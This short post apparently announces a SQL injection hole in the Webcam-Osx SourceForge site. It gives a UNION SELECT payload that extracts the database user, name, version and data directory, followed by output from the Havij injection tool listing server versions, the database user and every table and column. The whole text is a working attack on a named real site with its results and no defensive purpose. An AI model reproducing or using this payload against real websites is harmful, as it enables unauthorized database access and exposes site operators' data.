Webcam-Osx.Sourceforge is vulnerable to sql injection.
Vulnerable Url:**/UNION/**/ALL/**/SELECT/**/1,concat_ws(0x3a,user(),database(),@@version,@@datadir),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
Havij.exe results:
Too lazy to do it manually.
Host IP:
Web Server: nginx/0.7.63
Powered-by: PHP/5.2.11
DB Server: MySQL unknown ver
Current User: w44375ro@
Sql Version: 5.1.47
Current DB: w44375_camera_support
System User: w44375ro@
Host Name:
Installation dir: /usr/
DB User: 'w44375ro'@'%'
Data Bases: information_schema
Data Base Found: w44375_camera_support
Tables found: camera_sensor,cameras,controllers,manufacturers,notes,sensors,status
Table Name: camera_sensor
Columns found on table camera_sensor: camera,sensor
Table Name: cameras
Columns found on table cameras: id,name,manufacturer,controller,status,VID,PID,remarks
Table Name: controllers
Columns found on table controllers: id,name,manufacturer
Table Name: manufacturers
Columns found on table manufacturers: id,name
Table Name: notes
Columns found on table notes: id,note,tablename,tableid
Table Name: sensors
Columns found on table sensors: id,name,manufacturer
Table Name: status
Columns found on table status: id,name,description
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